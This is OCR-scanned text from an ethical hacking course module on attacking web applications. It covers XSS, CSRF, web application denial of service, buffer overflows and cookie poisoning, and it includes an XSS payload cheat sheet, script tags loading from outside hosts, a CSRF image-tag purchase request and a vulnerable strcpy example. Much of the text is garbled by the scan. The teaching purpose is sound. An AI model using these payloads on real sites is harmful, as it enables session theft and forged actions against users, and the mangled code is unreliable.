63 Ethical Hacking and Countermeasures Hacking Web Applications X S S E x a m p l e : A t t a c k v i a E m a i l C E H r r r 1 U s e r's B ro w s e r M a lic io u s S c rip t A tta c k e r's S e rv e r L e g itim a te S e rv e r < A H R E F = h t t p : / / j u g g y b o y b a n k. c a n / a m a licious lin k r e g i s t r a t i o n. c x j i? c l i e n t p r o f i l e = < S C R I P T > m a l i c i o u s c o d e < / S C R I P T» C l i c k h e r e < / A > th e URL to user and convince user to click on it Mi _ Request th e page o...! Page w ith m alicious scrip t Run... C o pyright by E&C01nal.A ll R ights Reserved. Reproduction is S trictly Prohibited. X S S E x a m p l e : A t t a c k v i a E m a i l The fo llo w in g are th e steps involved in an XSS attack via em ail: 1. C onstruct a m alicious link: <AHREF=h t t p : / / ju g g y b o y b a n k.c o m /r e g is tr a tio n. c g i? c lie n tp r o file = < S C R IP T > m a lic io u s code</s C R IP T > > C lic k h e re < /A > 2. th e URL to th e user and convince th e user to click on it. 3. User requests th e page. 4. L e g itim a te server sends a response page w ith m alicious script. 5. M alicious scrip t runs on th e user's brow ser. Module 13 Page 1785 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

64 Ethical Hacking and Countermeasures Hacking Web Applications IS User's Browser M alicious Script A ttackers Server Legitim ate Server Q Construct a malicious link <A HREF=http: / / ^uggyboybeink. com / r e g i s t r a t i o n. c g i? c lie n tp r o file = < S C R I P T > m a lic io u s c o d e c /S C R I P T» C lic k h ere< /A > FIGURE : A tta c k v ia E m a il Module 13 Page 1786 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

65 Ethical Hacking and Countermeasures Hacking Web Applications X S S E x a m p l e : S t e a l i n g U s e r s ' C o o k i e s C E H U s e r's B ro w s e r M a lic io u s S c rip t A tta c k e r's S e rv e r Host a page w ith m alicious script ^ ^ vkv i eiew w th e page hosted Dy by th e attacker HTML containing m alicious s c r i p t! ז...«Run... -! R e d ire ct to a tta cke r's server <... ( C ollect user's cookies Send th e request w ith th e user's cookies C o pyright by E&C01nal.A ll R ights Reserved. Reproduction is S trictly Prohibited X S S E x a m p l e : S t e a l i n g U s e r s * C o o k i e s vu To steal th e user's cookies w ith th e help o f an XSS attack, th e a tta cke r looks fo r XSS nera b ilitie s and th e n installs a cookie ste a le r (cookie logger). The fo llo w in g are th e various steps involved in stealing user's cookies w ith th e help o f XSS attack: 1. A tta cker in itia lly hosts a page w ith m alicious script 2. The user visits th e page hosted by atta cker 3. The atta cke r's server sends th e response as HTML co n ta in in g m alicious script 4. The user's bro w se r runs th e HTML m alicious script 5. The Cookie Logger present in th e m alicious script collects user's cookies 6. The m alicious script redirects th e user to atta cker's server 7. The user's bro w se r sends th e request w ith th e user's cookies Module 13 Page 1787 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

66 Ethical Hacking and Countermeasures Hacking Web Applications Malicious Script... View,- th e page hosted by th e attacker! I I H TM L c o n ta in in g m a lic io u s script!< ט ז...י מ U s e r's B ro w s e r 1 I a page w ith m a lic io u s s c rip t... ו... * I Run R edirect to attacker's!<... &... > d ' i I s e rv e r A tta c k e r 's S e rv e C o lle ct user s cookies Send th e re q u e s t w ith th e user's cookies Attacker's S e rv e r I FIGURE : S te a lin g U s e rs ' C o o k ie s Module 13 Page 1788 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

67 Ethical Hacking and Countermeasures Hacking Web Applications XSS E x a m p le : S e n d in g a n U n a u th o riz e d R e q u e s t C E H U s e r's B ro w s e r M a lic io u s S c rip t A tta c k e r's S e rv e r A tta c k e r's S e rv e r C onstruct a m alicious link th e URL td user and convince user to click on it... * Request th e page I Page w ith m alicious script Run A n a u th o rize d re q u e st C o pyright by E&C01nal.A ll R ights Reserved. Reproduction is S trictly Prohibited. X S S E x a m p l e : S e n d i n g a n U n a u t h o r i z e d R e q u e s t Using an XSS attack, th e a tta cke r can also send an unauth o rize d request. The fo llo w in g are th e steps involved in an XSS a tta ck intended to send an u n a u th o riz e d re q uest: 1. A tta cke r constructs a m alicious link 2. Sends an em ail conta in in g th e URL to user and convinces user to click on it 3. The user's bro w se r sends a request to th e atta cker's server fo r th e page 4. The atta cke r's server in response to th e user's request sends th e page w ith m alicious scrip t 5. The user's bro w se r runs th e m alicious script 6. The m alicious script sends an a u th o riz e d re q u e st Module 13 Page 1789 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

68 Ethical Hacking and Countermeasures Hacking Web Applications FIGURE : S e n d in g a n U n a u th o riz e d R e q u e s t Module 13 Page 1790 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

69 Ethical Hacking and Countermeasures Hacking Web Applications X S S A t t a c k i n B l o g P o s t i n g C E H 4 a Malicious code <script>onload= window.iocation= ' </script> is injecting the blog post U s e r r e d ir e c t e d to a m a lic io u s w e b s ite ju g g y b o y.co m Web Application Malicious Website C o pyright by E&C01nal.A ll R ights Reserved. Reproduction is S trictly Prohibited X S S A t t a c k i n a B l o g P o s t i n g The fo llo w in g diagram depicts th e XSS attack in a blog posting: A tta cker adds a m alicious script in th e c o m m e n t fie ld o f blog post Malicious code <script>onload= w indow. location= 'http ://w w w.ju g g ybcy.com ' </script> is injecting th e blog post C o m m ent w ith m alicious lin k is stored on the server U s e r r e d ir e c t e d t o a m a lic io u s w e b s it e ju g g y b o y. c o m Database Server W eb Application Malicious W ebsite FIGURE 13.20: XSS Attack in a Blog Posting Module 13 Page 1791 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

70 Ethical Hacking and Countermeasures Hacking Web Applications X S S A t t a c k i n C o m m e n t F i e l d C E H o o o o U s e r v is its th e I T e c h P o s t w e b s ite Face book acquires file-sharing service New York-based start-up that lets users privately and sporadicaty share fles through a drag-anddrop interface with additional options C o m m en t Jason, I love your blog post! - Mark ([email protected]) Leave your com m ent Malicious code < s c rip t» a le rt ("H e ll o Wor Id ") < / sc r ip t> is injecting th e blog post H I ן H^lnVWnild D a t a b a s e S e r v e r C o m m e n t w ith m a lic io u s lin k is s to re d o n th e s e rv e r W e b A p p l i c a t i o n T he a le r t p o p s u p as so o n as th e w e b p ag e is lo a d e d I <*...i P o p u p W i n d o w C o pyright by E&C01nal.A ll R ights Reserved. Reproduction is S trictly Prohibited. J X S S A t t a c k i n a C o m m e n t F i e l d M any In te rn e t w eb program s use HTML pages th a t dynam ically accept data fro m... d iffe re n t sources. The data in th e HTML pages can be d y n a m ic a lly changed according to th e request. A ttackers use th e HTML w eb page's tags to m a n ip u la te th e data and to launch th e attack by changing th e com m ents fe a tu re w ith a m alicious script. W hen th e ta rg e t sees th e c o m m e n t and activates it, th e n th e m a licio u s s c rip t is executed on th e ta rg e t's brow ser, in itia tin g m alicious perform ances. Module 13 Page 1792 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

71 Ethical Hacking and Countermeasures Hacking Web Applications a a s 1 I c c h P o M IMOM n.ort.tolo יי היי Facebook acquires file-sharing service N#w York baved start up that! tt users privately end sporadically share files through a drag and drop interfece with Additional op tion s Attacker Leave your comment Ja so n, 11 o v a y o u r blog p o st! < s c r i p t > a l e r t ( H e l l o W o r l d " ) < / s c r i p t > A tta cker adds a m alicious script In th e com m e nt fie ld o f blog post M alicious code < s c r i p t > a l e r t ( " H e l l o W o r l d " ) < / s c r i p t > is injecting the blog post Database Server Com m ent w ith m alicious link is stored on the server Web Application The a le rt pops up as soon as th e w e b page Is loaded Pop up W in do w FIGURE : XSS A tta c k in a C o m m e n t F ie ld Module 13 Page 1793 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

72 Ethical Hacking and Countermeasures Hacking Web Applications X S S C h e a t S h e e t H C E H UilifM itkiul Mm few XSS locator: {()}&=< XSS > -!; N o rm al XSS JavaScript injection: <SCRIPT SRC=h ttp ://h a x k e rs.o rg /x s s.js x /S C R IP T > <";( javascript:alert('xss = SRC Image XSS: <IM G N o q u o te s a n d no semicolon: <IMG SRC=javascript:alert( XSS')> Case insensitive XSS attack vector: <IM G SRC=JaVaScRIPt:alert('XSS')> HTML en title s: <1MG SRC =javascr ip t: ale rt (& q u o t; XSS&q u o t; )> Grave accent obfuscation: <IMG SRC= javascript :alert(" RSnake says, 'XSS'T> M a lfo rm e d IM G tags:<img > )</SCRIPT>" " x S C R IP T > a le rtf XSS" Em bedded tab : <IM G SRC«"Jav ascript:aiert('xss');h> Em bedded encoded tab : <IM G SRC jav& #x09;ascrlp t: ale rt (,XSS );" > Em bedded tab : <IM G SRC="jav ascript:aiert('xss');"> Em bedded encoded tab : <IM G > ";( XSS,) )av & # x 0 9 ;a s a lp t: ale rt SRC Em beded n ew lin e: <IM G SRC="jav&#xOA;ascript:alert('XSS');"> Em bedded carriage return: <1MG > ;) alertfxss : jav&#xod;ascript SRC NuN Chars: p eri -e 'p rin t "<1MG SRC=java\Oscri p t: ale rt(\"xss\" )> ";'> out N on-alpha-non-digit XSS: <SCR1PT/XSS SRC=" h ttp ^ /h a.d c ers^fg /x ss.js " x/s C R!P T> N on-alpha-non-digit p art 2 XSS: <BODY <( XSS rt< \K '= a le.,:;? /]@ 1 ()-+ & %!#$ onload Extraneous o pen brackets: «SCRJPT>alert("XSS") ; / / «/ SCR1PT> N o dosing script tags: <SCRIPT SRC= > Protocol reso lu tio n in script tags: <SCRIPT SRC //h a x k e rs.o rg /.j> Half o p en H TML/JavaScript XSS vector: <IM G = SRC javascript :alert('xss')" D ouble o pen angle brackets: < lfram e src h ttp ://h a.c k e rs.org/scriptlet.htmi < XSS w ith no single q u o tes o r double quotes or semicolons: SCRIPT>alert (/X S S /source K/SCRIPT> Escaping JavaScript escapes: \ a ; le rt('x S S ');// End title tag: </TTTlExSCRJPT>aiert( XSS );</SCRlPT> INPUT im age :<IN PUT TYPE=" IMAGE" > ;(' XSS SRC*" Javascri p t: ale rt (' IMG Dynsrc: <1MG > ) alertcxss ja va sa ip t DYNSRC IM G lowsrc:<im G < ) XSS "Javasalpt: ale r t f DYNSRC IMG lowsrc:<img LOWSRC=" javascript :alert('xss')"> BGSOUND:<BGSOUND > ;)' rt('xss ja va sa lp t :ale SRC LAYER:<LAYER SRC= " h ttp ://h a x k e rs.o rg / script le th tm T x /L A Y E R > REL="stylesheet STYLE sheet: <LINK > ;)* XSS, ja ' HREF va sa lp t :ale rt( Local htcfile:<xssstyle "behavk>r: urhxssjttc);"> VBscript in an Im age: <IMG * SRC v b s a ip t: m sgbox( XSS") > Mocha: <IMG SRC "Hvescript:[code]"> US-ASCII encoding: isaiptualert(exsse)i/saiptu META:<META H TTP-EQUfV-"rafrash" < ;( XSS ) CONTENT="0;uH=javascript:alert TABLE:<TABLE < ) XSS alert( javascript: D BACKGROUN TD:<TABLExTD < ) alert(*xss : ja va sa lp t D BACKGROUN Copyright by E & C au icfl. All Rights Reserved. Reproduction is Strictly Prohibited. X S S C h e a t S h e e t XSS locator -.' < X S S > = *{ ()} normal XSS ;a v a S a ip t in a ctio n <SCRIFT SRC=nttp J f ha tte rs o rg /c ss jsx/s C R IP T > * * 6 «p * Mo qikrtrc ח 4 m je m ic o to : <1MG Case *nsensitrve XSS a t t a o v e cto r < «*G Embedded carriage r e tu r n IMG.י: S R C = *jfg ^ k O O.a s c n p t a t e f t f X S S '^ M * O m n (K fl.-e *print < *A G SRC-ynvn \Oscnpta *ertf\*xssv > out W:m a!pr»»-n&n Ctg:t XSS <SCR1FT/XSS S H C :*n ttp y /h a ckers org/kss.js xv S C R IF T > p v t 2 XSS <SOOY << * I / - X S S? - * ( Evtraneous open brackets < <SCRIFT>eft ( TCSS y / «/5 C W F T > MG (SKiC^clMG a»ist1«jusdi 0vNs*c s t M G I f w V C < M 6 SGSOUND.-SGSOL'ND «< WOBSaRSJUSCft* S^ LAVER LAYER SHC= * H ttp y /n a.a efs.o rg /s c r1p tiet-m m J x /la Y E R > H TML entrties * IM G No O a su ^ senpt f g z. <SO U FT SRC =attpy/aa.cilers.org/css.js*«:*> G rave accent o d f ascatioa: < IM G Protocol resolution m senpt tags <SCRIPT S R C 0 & «6 0 1 * «נ 6 8 מ 8 S & C T V TCSS")'> SRC=//fca.clters.org/.j> S T Y U sheet: <UNK R E U - g T f e t t c g r > HREF= ttw650 ljj1>foixss local M c.fo e <XSS S T 1 U = '» e M w o r M a rfo rm e o IM G tags :IMG > < SCRIPT />< XSS ajert{ * xs C R IP T > * Emoedded ta tr <JMG SR C =*jav > ; TCSS'J w ^ t a k r ^ Em oeooefl encoded tab : < IM G SRC=*jjx&*»c09;ascnpt a *ert('xss'> / > Embedded t a t <1MG SRC= jay < :<' s» sji! ss s Em bedded encoded t a d : «IM G '> ; ( XSS ) n»ert SRC= '0x^acO9 ;ascnpt fflww ' G**> >. ) S! w M 1 «f la» n p t» l«r tlt C S S *C H a*f o p e K T M t/ja v a S c n p t X 5 vector d M G S R C = *» v «5 q n jt^ ie r^ X S S 7 ' Dootrte open angle Dradcets gty^tittpy/ha.cfcers.org/sertpttet.fttmi < XSS w r t t bo saftgte Quotes o r dow&te quotes or semacoftoaa: S C R *T > «le rt(/x S S /-S 0«1rc e > < /S a 1FT> Escaping J r a S c n p t escapes W a t e r * x s s y / Ena title tag < / T T m x s c R ^ > a ie r t ( * x s s * W s a a P T > INPUT m n JM FVT T Y P E = *IN»G E ' < imkratf,^ ' VBscript in an im a g e. <JMG > sgtx)»cf*xss7 SR C =Vtecript:m M o c M <JMG SRC= 1nrescnpt:JcodeI*> US-ASOI encoding go Tpya>m lex SSE fjxz> p lv M E T A < M E T A K T T F -E Q IW r-re fie s a * C 0 t a e m = 0 : m t = ff r K a T f t : * e r t fxss V > TABLE ctable b a c x g r o u n o = ^ ^ t y i p t t r t j r c s s f > T D x T A U f x T O > a*ertftcss7 *avascrw t =< i a c k g r o u m FIGURE 13.22: XSS Cheat Sheet Module 13 Page 1794 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

73 Ethical Hacking and Countermeasures Hacking Web Applications Cross-Site R equest F o rg e ry (CSRF) A ttack E (*rtifxd c 1 l \ lt»k4l IlMtm J C ross-s ite R e q u e st F o rg e ry (CSRF) a tta c k s e x p lo it w e b p a g e v u ln e r a b ilitie s th a t a llo w an a tta c k e r t o fo rc e an u n s u s p e c tin g u s e r's b ro w s e r t o s e n d m a lic io u s re q u e s ts th e y d id n o t in te n d J T h e v ic tim u s e r h o ld s an a c tiv e sessio n w ith a tru s te d s ite a n d s im u lta n e o u s ly v is its a m a lic io u s s ite, w h ic h in je c ts an HTTP r e q u e s t fo r th e tru s te d s ite in to th e v ic tim u s e r's se ssio n, c o m p ro m is in g its in te g r ity fc User Logs in to th e tru sted site and creaitesa news! :sion Tru ste d W e b site > M alicious W ebsite S to res th e se ssio n id e n t f ie rfo rth e י sessio n in a c o o k ie in th e w eb b ro w ser... S ends a re q u e st fro m th e use r's! using his session cookie ! C opyright by E&C01nal.A ll Rights Reserved. Reproduction is Strictly Prohibited. C r o s s - s i t e R e q u e s t F o r g e r y ( C S R F ) A t t a c k Cross-site request fo rg e ry is also know n as a one-click attack. CSRF occurs w hen a user's w eb brow ser is instructed to send a request to the venerable w ebsite th ro u g h a m alicious w eb page. CSRF vu ln e ra b ilitie s are very com m o n ly found on fin a n c ia l-re la te d w ebsites. C orporate in tra n e ts usually ca n 't be accessed by th e outside attackers so CSRF is one o f th e sources to e n te r in to th e n e tw o rk. The lack o f the w eb applicatio n to d iffe re n tia te a request done by m alicious code fro m a genuine request exposes it to CSRF attack. Cross-Site request fo rg e ry (CSRF) attacks e xp lo it w eb page vu ln e ra b ilitie s th a t allow an attacker to force an unsuspecting user's brow ser to send m alicious requests th e y did not intend. The victim user holds an active session w ith a tru ste d site and sim ultaneously visits a m alicious site, w hich injects an HTTP request fo r th e tru ste d site in to th e victim user's session, com prom ising its in te g rity. Module 13 Page 1795 Ethical Hacking and Countermeasures Copyright by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

74 User O Trusted Website Malicious Website Logs into the trusted site and creates a new se sion י Stores the s!esslon Identffl er fo r the session In a clookle In the web browser י < Visits a ma aft Sends a request from the user's using his session cookie browser F IG U R E : C r o s s - s ite R e q u e s t F o r g e r y (C S R F ) A t t a c k M odule 13 Page 1796

75 H o w C S R F A t t a c k s W o r k In a cross-site request forgery attack, the attacker waits fo r the user to connect to the trusted server and then tricks the user to click on a malicious link containing arbitrary code. W hen the user clicks on the malicious link, the arbitrary code gets executed on the trusted server. The follow ing diagram explains the step-by-step process of a CSRF attack: M odule 13 Page 1797

76 Client Side Code Symbol k Shares <form action= buy.php" method="post"> <p>symbol: <input type="text" name- symbor /x/p> <p>shares: <input type-'text" name=,,shares /></p> <pxinput type="submit" value="buy" /></p> </form>r User logs into trusted server using his credentials o Server sets a session cookie In the user's browser Malicious code is executed in the trusted server Server Code <<?php s e s s io n _ s ta r t(); i f (isset($_request[' sym bol'] && i s s e t ($_REQUEST [ י sh ares ' ] )) {buy_stocks ($_REQUEST[ י symbol י ], $_REQUEST[ sh a re s ]);}?> r Trusted Server Attacker sends a phishing mall tricking user to send a request to a malicious site ט Attacker Response page contains malicious code User requests a page from the malicious server 0 Malicious Code < im g s r a = " h t t p : / / j u g g y b o y. o o r a /j u g g y s h o p. p h p? s y m b o l= M S F T & s h a r e s = ,r / > Malicious Server F IG U R E : H o w CSRF A t ta c k s W o r k M odule 13 Page 1798

77 W e b A p p l i c a t i o n D e n i a l - o f - S e r v i c e ( D o S ) A t t a c k CEH Attackers exhaust available server resources by sending hundreds of resource-intensive requests, such as pulling out large image files or requesting dynamic pages that require expensive search operations on the backend database servers W hy Are Applications Vulnerable? Reasonable Use of Expectations Application Environment Bottlenecks ג - Implementation Flaws - Poor Data Validation W e b S e r v e r R e s o u r c e C o n s u m p t i o n W e b S e r v i c e s U n a v a i l a b i l i t y i Targets CPU, Memory, and Sockets ג : - Disk Bandwidth : i - Database Bandwidth : - Worker Processes B O B B O B Application-level DoS attacks emulate the same request syntax and network-level traffic characteristics as that of the legitimate clients, which makes it undetectable by existing DoS protection : measures : Copyright by EG-G0llial. All Rights Reserved. Reproduction is Strictly Prohibited. י W e b A p p l i c a t i o n D e n i a l o f S e r v i c e ( D o S ) A t t a c k Denial-of-service attacks happen w hen the legitim ate users are prevented from perform ing a desired task or operation. A ttackers exhaust available server resources by sending hundreds of resource-intensive requests, such as pulling out large image files or requesting dynam ic pages th a t require expensive search operations on the backend database servers. The follow ing issues make the w eb applications vulnerable: Reasonable Use of Expectations Application Environm ent Bottlenecks Im plem entation Flaws Poor Data Validation Application-level DoS attacks em ulate the same request syntax and netw ork-level traffic characteristics as th at of the legitim ate clients, which makes it undetectable by existing DoS protection measures. In web application denial-of-service attack the attacker targets and tries to exhaust CPU, m em ory, Sockets, disk bandw idth, database bandw idth, and w orker processes. Some o f th e co m m on ways to p erfo rm a w e b application DoS attack are: Bandwidth co nsu m p tion -flo o ding a n etw o rk w ith data M odule 13 Page 1799

78 Q Resource s ta rv a tio n -d e p le tin g a system 's resources P ro g ra m m in g fla w s -e x p lo itin g b u ffe r o ve rflo w s R outing and DNS a tta c k s -m a n ip u la tin g DNS tables to p o in t to a lte rn a te IP addresses M odule 13 Page 1800

79 - D e n i a l - o f - S e r v i c e ( D o S ) E x a m p l e s CEH User Registration DoS The a tta c k e r c o u ld c re a te a pro g ra m th a t subm its th e re g is tra tio n fo rm s repeatedly, adding a large n um ber o f spurious users to the application Login Attacks The a tta c k e r m ay o v e rlo a d th e lo gin process by co n tin u a lly sending lo gin requests th a t require th e p re s e n ta tio n tie r to access th e a u th e n tic a tio n mechanism, rendering it unavailable o r unreasonably slow to respond User Enumeration If a p p lic a tio n sta te s w h ic h p a rt o f th e user n a m e /p a s s w o rd p a ir is in c o rre c t, an a tta c k e r can a u to m a te th e process o f try in g c o m m o n user n a m e s fro m a dictionary file to enum erate the users o f the application Account Lock Out Attacks The a tta c k e r m ay e n u m e ra te user nam es th ro u g h a n o th e r v u ln e ra b ility in th e a p p lic a tio n and th e n a tte m p t to a u th e n tic a te to th e site using va lid user n a m e s a n d in c o rre c t passw o rd s, w h ic h w ill lo ck o u t th e a ccou nts a fte r th e sp e cifie d n u m b e r o f fa ile d a tte m p ts. A t th is p o in t le g itim a te users w ill not be able to use the site Copyright by E&C01nal. All Rights Reserved. Reproduction is Strictly Prohibited. D e n i a l o f S e r v i c e ( D o S ) E x a m p l e M o s t w e b a pp lica tions are designed to serve o r w ith s ta n d w ith lim ite d requests. If th e lim it is exceeded, th e w e b a p plication m a y fail th e server th e a d d ition a l requests. A ttacke rs use advantage to launch denial-of-service attacks on th e w e b applications. A ttackers send to o m an y requests to th e w e b ap p lica tio n until it gets exhausted. O nce th e w e b a p plication receives enou gh requests, it stops re s p o n d in g to o th e r re quest th o u g h it is sent by an a u th o riz e d user. This is because th e a tta cke r override s th e w e b a p plication w ith false requests. V arious w e b a p plication DoS attacks include: 6 User Registration DoS: The a tta cke r could create a pro g ra m th a t su b m its th e re g istra tion fo rm s re p e a te d ly adding a large n u m b e r o f spurious users to th e application. Login A tta cks: The login p ro ce d u re is ove rlo a d e d by th e a tta cke r by re p e a te d ly tra n s fe rrin g login requests th a t need th e p re se n ta tio n tie r to a d m it th e req u e st and access th e v e rifica tio n in structions. W h e n th e requests are o v e rlo a d e d, th e n th e process becom es slow o r unavailable to th e genuine users. Q User Enum eration: W h e n th e a p plication responds to any user a u th e n tic a tio n process w ith th e e rro r message declaring th e area o f in co rre ct in fo rm a tio n, th e n th e atta cke r can easily m a n ip u la te th e p ro ce d u re by b ru te fo rcin g th e c o m m o n user nam es fro m a d ictio n a ry file to e stim a te th e users o f th e applicatio n. M odule 13 Page 1801

80 0 Account Lock-Out Attacks: D ictio nary attacks can be m in im iz e d by applying th e a ccou nt lock m e th o d. The a tta cke r m ay e n u m e ra te user nam es th ro u g h v u ln e ra b ility in th e a p plication and th e n a tte m p t to a u th e n tic a te th e site using valid user nam es and in co rre ct passw ords th a t w ill lock o u t th e accounts a fte r th e specified n u m b e r o f failed a tte m p ts. A t this poin t, le g itim a te users w ill n o t be able to use th e site. M odule 13 Page 1802

81 B u f f e r O v e r f l o w A t t a c k s CEH B u ffe r o v e r flo w o c c u rs w h e n an a p p lic a tio n w r ite s m o re d a ta t o a b lo c k o f m e m o ry, o r b u ffe r, th a n th e b u ffe r is a llo c a te d to h o ld A b u ffe r o v e r flo w a tta c k a llo w s an a tta c k e r to m o d ify th e ta r g e t p ro c e s s 's a d d re s s sp a ce in o rd e r to c o n tro l th e p ro c e s s e x e c u tio n, cra sh th e process, and m o d ify internal variables A tta c k e rs m o d ify fu n c tio n p o in te rs used b y th e a p p lic a tio n to d ir e c t p ro g ra m e x e c u tio n th ro u g h a ju m p o r call in s tru c tio n a n d p o in ts it to a lo c a tio n in th e m e m o ry c o n ta in in g m alicious codes V Vulnerable Code in t main(int argc, char *argv[]) { char *dest_buffer; dest_buffer = (char *) malloc(10); i f (NULL = dest_buffer) return -1; if (argc > 1) { strcpy(dest_buffer, argv[ 1 ]); printf("the firs t oomnand-line argument is s.\n %, dest_buffer); ) else { printf ("No command-line argument was given. \n"); } f ree(dest_buf fer); return 0; } Note: For complete coverage of buffer overflow concepts and techniques, refer to M odule 18: Buffer Overflow Copyright by E&C01nal. All Rights Reserved. Reproduction is Strictly Prohibited. B u f f e r O v e r f l o w A t t a c k s A b u ffe r has a specified data storage capacity, and if th e c o u n t exceeds th e original, th e b u ffe r o ve rflo w s; this m eans th a t b u ffe r o v e rflo w occurs w h e n an a p plicatio n w rite s m o re data to a block o f m e m o ry, o r b u ffe r, th a n th e b u ffe r is allocated to hold. Typically, b uffers are deve lop e d to m a in ta in fin ite data; a d d ition a l in fo rm a tio n can be dire cte d w h e re v e r it needs to go. H o w eve r, extra in fo rm a tio n m ay o v e rflo w in to n e ig hb o rin g buffers, d e stro yin g or o v e rw ritin g legal data. A r b i t r a r y C o d e A b u ffe r o v e rflo w atta ck allow s an a tta cke r to m o d ify th e ta rg e t process's address space in o rd e r to c o n tro l th e process execution, crash th e process, and m o d ify interna l variables. W h e n a b u ffe r o ve rflo w s, th e execu tion stack o f a w e b ap p lica tio n is dam aged. An a tta cke r can th e n send specially crafted in p u t to th e w e b ap plication, so th a t th e w e b ap p lica tio n executes th e a rb itra ry code, a llo w in g th e a tta cke r to successfully take ove r th e m achine. A ttackers m o d ify fu n c tio n p o in te rs used by th e a p plica tion to re d ire ct th e pro g ra m e xecution th ro u g h a ju m p o r call in stru ctio n to a location in th e m e m o ry co n ta in in g m alicious code. B uffer o v e rflo w s are n o t easy to discover, and even upon discovery th e y are d iffic u lt to exploit. H ow e ver, th e a tta cke r w h o recognizes a p o te n tia l b u ffe r o v e rflo w can access a staggering array o f pro d u cts and c o m p o n e n ts. M odule 13 Page 1803

82 B u f f e r O v e r f l o w P o t e n t i a l Both the w eb application and server products, which act as static or dynam ic features of the site or o f the w eb application, contain the potential fo r a buffer overflow error. Buffer overflow potential th at is found in server products is com m only known and creates a th re at to the user of th a t product. W hen w eb applications use libraries, they become vulnerable to a possible buffer overflow attack. Custom w eb application code, through which a w eb application is passed, may also contain buffer overflow potential. Buffer overflow errors in a custom web application are not easily detected. There are few er attackers w ho find and develop such errors. If it is found in the custom application (other than crash application), the capacity to use this error is reduced by the fact th a t both the source code and error message are not accessible to the attacker. V u l n e r a b l e C o d e i n t m a in ( in t a rg c, c h a r * a r g v [ ] ) { c h a r * d e s t _ b u f f e r ; d e s t_ b u ffe r = (c h a r *) m a llo c ( lo ) ; i f (NULL == d e s t_ b u ffe r ) r e t u r n - 1 ; i f (a rg c > 1) { s t r c p y ( d e s t _ b u f f e r, a r g v [ l ] ) ; p r i n t f ( " T h e f i r s t co m m an d-line argum ent i s % s.\n ", d e s t _ b u f f e r ) ; } e ls e { p r i n t f ( " N o co m m an d-line argum ent was g iv e n. \ n ) ; } f r e e ( d e s t _ b u f f e r ) ; r e t u r n 0; } Note: For com plete coverage o f buffer overflow concepts and techniques, refer to M odule 17: Buffer O verflow Attacks. M odule 13 Page 1804

83 I Cookie/Session Poisoning CEH ( rtifwd I itkitjl Nm Im Cookies are used to m aintain session state in the otherwise stateless HTTP protocol Modify the Cookie Content Inject the Malicious Content Rewriting the Session Data C o o k ie p o is o n in g a t ta c k s in v o lv e t h e m o d if ic a t io n o f t h e c o n t e n t s o f a c o o k ie ( p e r s o n a l in f o r m a t io n s to r e d in a w e b u s e r 's c o m p u t e r ) in o r d e r t o b y p a s s s e c u r it y m e c h a n is m s A P o is o n in g a llo w s a n a t ta c k e r t o in je c t t h e m a lic io u s c o n t e n t, m o d if y t h e u s e r 's o n lin e e x p e r ie n c e, a n d o b t a in t h e u n a u th o r iz e d in f o r m a t io n A p r o x y c a n b e u s e d f o r r e w r it in g t h e s e s s io n d a t a, d is p la y in g t h e c o o k ie d a t a, a n d / o r s p e c ify in g a n e w u s e r ID o r o t h e r s e s s io n id e n t if ie r s in t h e c o o k ie Copyright by E&C01nal. All Rights Reserved. Reproduction is Strictly Prohibited. C o o k i e / S e s s i o n P o i s o n i n g Cookies frequently transm it sensitive credentials and can be m odified w ith ease to escalate access or assume the identity of another user. Cookies are used to m aintain a session state in the otherw ise stateless HTTP protocol. Sessions are intended to be uniquely tied to the individual accessing the w eb application. Poisoning of cookies and session inform ation can allow an attacker to inject malicious content or otherw ise m odify the user's on-line experience and obtain unauthorized inform ation. Cookies can contain session-specific data such as user IDs, passwords, account num bers, links to shopping cart contents, supplied private inform ation, and session IDs. Cookies exist as files stored in the client com puter's m em ory or hard disk. By m odifying the data in the cookie, an attacker can often gain escalated access or maliciously affect the user's session. M any sites offer the ability to "R em em ber m e?" and store the user's inform ation in a cookie, so he or she does not have to re-enter the data w ith every visit to the site. Any private inform ation entered is stored in a cookie. In an a tte m p t to protect cookies, site developers often encode the cookies. Easily reversible encoding m ethods such as Base64 and ROT13 (rotating the letters of the alphabet 13 characters) give m any w ho view cookies a false sense o f security. M odule 13 Page 1805

84 Threats The com prom ise of cookies and sessions can provide an attacker w ith user credentials, allowing the attacker to access the account in order to assume the identity of o the r users of an application. By assuming another user's online identity, the original user's purchase history can be reviewed, new items can be ordered, and the services and access th at the vulnerable web application provides are open fo r the attacker to exploit. One of the easiest examples involves using the cookie directly fo r a uth en tica tion. A nother m ethod of cookie/session poisoning uses a proxy to rew rite the session data, displaying the cookie data a n d /o r specifying a new user ID or o the r session identifiers in the cookie. Cookies can be persistent or non-persistent and secure or non-secure. It can be one of these fo u r variants. Persistent cookies are stored on a disk and non-persistent cookies are stored in m em ory. Secure cookies are transferred only through SSL connections. M odule 13 Page 1806

